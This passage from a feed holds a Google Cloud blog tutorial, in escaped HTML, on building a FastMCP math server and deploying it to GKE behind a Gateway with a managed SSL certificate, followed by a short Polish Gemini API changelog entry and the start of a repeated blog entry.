&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Next, create the additional files needed: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for the MCP server code, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;test_server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for testing, and a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for the container deployment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Math MCP server&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Large language models are excellent at non-deterministic tasks, such as generating text, summarizing ideas, and reasoning about concepts. However, they can be unreliable for deterministic tasks like math operations. To solve this, developers can create tools that provide valuable context. Using &lt;/span&gt;&lt;a href="https://gofastmcp.com/getting-started/welcome" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;FastMCP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a framework for building MCP servers in Python, it is possible to create a simple math server with two tools: add and subtract.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;First, add FastMCP as a dependency.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv add fastmcp\r\nuv add asyncio&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6c40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Copy the following code into &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to create the server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from fastmcp import FastMCP\r\nfrom starlette.requests import Request\r\nfrom starlette.responses import PlainTextResponse\r\nimport asyncio\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(format=&amp;quot;[%(levelname)s]: %(message)s&amp;quot;, level=logging.INFO)\r\n\r\nmcp_port=3000\r\n\r\n# Initialize the FastMCP server\r\nserver = FastMCP(\r\n    &amp;quot;Math Server&amp;quot;,\r\n)\r\n\r\n@server.tool()\r\ndef add(a: int, b: int) -&amp;gt; int:\r\n    &amp;quot;&amp;quot;&amp;quot;Add two numbers together.&amp;quot;&amp;quot;&amp;quot;\r\n    return a + b\r\n\r\n@server.tool()\r\ndef subtract(a: int, b: int) -&amp;gt; int:\r\n    &amp;quot;&amp;quot;&amp;quot;Subtract the second number from the first.&amp;quot;&amp;quot;&amp;quot;\r\n    return a - b\r\n\r\n@server.custom_route(&amp;quot;/healthz&amp;quot;, methods=[&amp;quot;GET&amp;quot;])\r\nasync def health_check(request: Request) -&amp;gt; PlainTextResponse:\r\n    &amp;quot;&amp;quot;&amp;quot;Simple health check endpoint that returns a 200 OK response&amp;quot;&amp;quot;&amp;quot;\r\n    return PlainTextResponse(&amp;quot;OK&amp;quot;)\r\n\r\nif __name__ == &amp;quot;__main__&amp;quot;:\r\n    logger.info(f&amp;quot; MCP server started on port {mcp_port}&amp;quot;)\r\n    # Could also use \&amp;#x27;sse\&amp;#x27; transport, host=&amp;quot;0.0.0.0&amp;quot; required for Cloud Run.\r\n    asyncio.run(\r\n        server.run_async(\r\n            transport=&amp;quot;streamable-http&amp;quot;, \r\n            host=&amp;quot;0.0.0.0&amp;quot;,\r\n            port=mcp_port\r\n        )\r\n    )&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;lang-py&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6880&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This example uses the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;streamable-http&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; transport, which is recommended for remote servers. The script encapsulates the logic needed to run a scalable MCP endpoint.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Testing the MCP server locally&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;test_mcp_server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; script to connect to test the MCP Server. This will be useful to test the MCP server before deploying it to GKE.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from fastmcp import Client, FastMCP\r\nimport asyncio\r\nimport logging\r\n\r\n# Connect to the remote MCP server\r\nclient = Client(&amp;quot;https://localhost:3000/mcp&amp;quot;)\r\n\r\nasync def test_remote_server():\r\n    async with client:\r\n        # Basic server interaction\r\n        await client.ping()\r\n\r\n        # List available operations\r\n        tools = await client.list_tools()\r\n        print(f&amp;quot;Available tools: {tools} \\n&amp;quot;)\r\n\r\n        # Execute add operation\r\n        result = await client.call_tool(&amp;quot;add&amp;quot;, {&amp;quot;a&amp;quot;: 5, &amp;quot;b&amp;quot;: 3})\r\n        print(f&amp;quot;Result of addition: {result} \\n&amp;quot;)\r\n\r\n        # Execute subtract operation\r\n        result = await client.call_tool(&amp;quot;subtract&amp;quot;, {&amp;quot;a&amp;quot;: 5, &amp;quot;b&amp;quot;: 3})\r\n        print(f&amp;quot;Result of subtraction: {result} \\n&amp;quot;)\r\n\r\nif __name__ == &amp;quot;__main__&amp;quot;:\r\n    asyncio.run(test_remote_server())&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;lang-py&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6dc0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run the MCP server locally to test the connection:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6520&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then execute the test script in a new terminal to verify the connection.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6fd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The output should print available tools and the results of invocing the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;add&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;subtract&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; tools confirming the MCP server is functional.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Building the container image&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To speed up the deployment process, build the container image while the cluster is still creating.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;First, prepare the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Dockerfile&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;FROM python:3.10-slim\r\nCOPY --from=ghcr.io/astral-sh/uv:0.4.15 /uv /bin/uv\r\nWORKDIR /app\r\nCOPY pyproject.toml .\r\nCOPY server.py .\r\nRUN uv sync\r\nCMD [&amp;quot;uv&amp;quot;, &amp;quot;run&amp;quot;, &amp;quot;server.py&amp;quot;]&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6af0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, set up the Artifact Registry and build the container image.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Set up Artifact Registry&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud artifacts repositories create mcp-repo \r\n--repository-format=docker \r\n--location=$REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6c10&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Build and push the image in parallel&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d66d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the image build is complete, verify that the cluster is ready and retrieve the credentials. If the output of the cluster is not "RUNNING" wait for it to be ready.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud container clusters list\r\ngcloud container clusters get-credentials mcp-cluster --region $REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6040&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Deploying to GKE with Gateway API and SSL&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The next step involves deploying the server workloads and exposing them securely using the &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/how-to/gatewayclass-capabilities" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Kubernetes Gateway API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; rather than the legacy Ingress. This guarantees secure, encrypted traffic via SSL certificates.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deployment.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file to define the Kubernetes Deployment and Service. Replace the placeholders with your actual project ID and region.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: mcp-server\r\nspec:\r\n  replicas: 2\r\n  selector:\r\n    matchLabels:\r\n      app: mcp-server\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: mcp-server\r\n    spec:\r\n      containers:\r\n      - name: mcp-server\r\n        image: $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest\r\n        ports:\r\n        - containerPort: 3000\r\n        resources:\r\n          requests:\r\n            memory: &amp;quot;256Mi&amp;quot;\r\n            cpu: &amp;quot;250m&amp;quot;\r\n          limits:\r\n            memory: &amp;quot;512Mi&amp;quot;\r\n            cpu: &amp;quot;500m&amp;quot;\r\n        livenessProbe:\r\n          httpGet:\r\n            path: /healthz\r\n            port: 3000\r\n          initialDelaySeconds: 15\r\n          periodSeconds: 20\r\n        readinessProbe:\r\n          httpGet:\r\n            path: /healthz\r\n            port: 3000\r\n          initialDelaySeconds: 5\r\n          periodSeconds: 10\r\n---\r\napiVersion: v1\r\nkind: Service\r\nmetadata:\r\n  name: mcp-service\r\nspec:\r\n  selector:\r\n    app: mcp-server\r\n  ports:\r\n  - port: 80\r\n    targetPort: 3000&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6cd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Apply this configuration to the cluster:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl apply -f deployment.yaml&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6e80&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Check the pods are up and running&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl get pods&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6940&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure our remote MCP Server is accessible let's try to reach it with a port-forward.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl port-forward svc/mcp-service 8080:80&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6850&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;http://localhost:8080/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d64c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now let's secure the connection. To do so, we'll use a Google-managed SSL certificate and attach it to a Gateway API resource. First, reserve a static IP address for your load balancer:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud compute addresses create mcp-server-ip --global\r\nexport MCP_SERVER_IP=$(gcloud compute addresses describe mcp-server-ip --global --format=&amp;quot;value(address)&amp;quot;)\r\necho &amp;quot;Your IP: $MCP_SERVER_IP&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6e20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Point your domain's DNS &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;A&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; record at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$MCP_SERVER_IP&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Example: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.yourdomain.com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a Google-Managed Certificate. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual domain.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud compute ssl-certificates create mcp-cert --domains mcp.yourdomain.com --global&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d63a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file to provision the load balancer and configure Transport Layer Security (TLS) termination.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Gateway: HTTPS load balancer with the managed certificate and static IP\r\napiVersion: gateway.networking.k8s.io/v1beta1\r\nkind: Gateway\r\nmetadata:\r\n  name: mcp-gateway\r\nspec:\r\n  gatewayClassName: gke-l7-global-external-managed\r\n  listeners:\r\n  - name: https\r\n    protocol: HTTPS\r\n    port: 443\r\n    tls:\r\n      mode: Terminate\r\n      options:\r\n        networking.gke.io/pre-shared-certs: mcp-cert\r\n  addresses:\r\n  - type: NamedAddress\r\n    value: mcp-server-ip\r\n---\r\n# HTTPRoute: forward traffic to the MCP Server\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n  name: mcp-route\r\nspec:\r\n  parentRefs:\r\n  - name: mcp-gateway\r\n  hostnames:\r\n  - &amp;quot;mcp.yourdomain.com&amp;quot;\r\n  rules:\r\n  - matches:\r\n    - path:\r\n        type: PathPrefix\r\n        value: /mcp\r\n    backendRefs:\r\n    - name: mcp-service\r\n      port: 80\r\n---\r\n# The GCPBackendPolicy is used to configure session affinity and other backend.\r\n# Since MCP Servers are stateful we enable session affinity. This ensures that\r\n# requests from the same client are sent to the same backend.\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n  name: mcp-backend-policy\r\nspec:\r\n  default:\r\n    sessionAffinity:\r\n      type: CLIENT_IP\r\n  targetRef:\r\n    group: &amp;quot;&amp;quot;\r\n    kind: Service\r\n    name: mcp-service\r\n---\r\n# The HealthCheckPolicy is used to configure custom health probes for the MCP Server.\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n  name: mcp-health\r\n  namespace: default\r\nspec:\r\n  default:\r\n    checkIntervalSec: 15\r\n    timeoutSec: 5\r\n    healthyThreshold: 1\r\n    unhealthyThreshold: 2\r\n    logConfig:\r\n      enabled: false\r\n    config:\r\n      type: HTTP\r\n      httpHealthCheck:\r\n        port: 3000\r\n        requestPath: /healthz\r\n  targetRef:\r\n    group: &amp;quot;&amp;quot;\r\n    kind: Service\r\n    name: mcp-service&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d65b0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying this configuration creates the infrastructure required to route external traffic securely to the MCP server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl apply -f gateway.yaml&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6400&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Wait a few minutes for the load balancer to become active and the certificate to provision. Developers can check the status using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl get gateway mcp-gateway&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Try to reach the remote MCP Server. Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://mcp.yourdomain.com/mcp&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;uv run test_mcp_server.py&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6310&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Cleanup&lt;/h2&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl delete -f deployment.yaml\r\nkubectl delete -f gateway.yaml\r\ngcloud compute addresses delete mcp-server-ip --global\r\ngcloud compute ssl-certificates delete mcp-cert --global\r\ngcloud artifacts repositories delete mcp-repo --location=$REGION\r\ngcloud container clusters delete mcp-cluster --region $REGION&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85803d6ee0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Continue reading&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying Model Context Protocol servers to Kubernetes enables new use cases for integrated agents and AI workflows. To dive deeper into these capabilities, explore the following resources:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://modelcontextprotocol.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Context Protocol documentation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/gateway-api" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Gateway API documentation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/jlowin/fastmcp" rel="noopener" target="_blank"&gt;FastMCP Repository&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/build-and-deploy-a-remote-mcp-server-to-gke-in-30-minutes" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://ai.google.dev/gemini-api/docs/changelog#06-17-2026</id>
    <title>Gemini API — 2026-06-17</title>
    <updated>2026-06-17T00:00:00+00:00</updated>
    <content type="text">Obsługa przesyłania strumieniowego w przypadku generowania mowy: przesyłanie strumieniowe za pomocą streamGenerateContent (i stream: true w interfejsie Interactions API) jest teraz obsługiwane w przypadku modelu gemini-3.1-flash-tts-preview . Więcej informacji znajdziesz w przewodniku Text-to-Speech .</content>
    <link href="https://ai.google.dev/gemini-api/docs/changelog#06-17-2026" rel="alternate"/>
    <category term="Gemini API"/>
    <published>2026-06-17T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/build-and-deploy-a-remote-mcp-server-to-gke-in-30-minutes/</id>
    <title>Build and Deploy a Remote MCP Server to GKE in 30 Minutes</title>
    <updated>2026-06-17T00:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;Build and Deploy a Remote MCP Server to GKE in 30 Minutes&lt;/h2&gt;
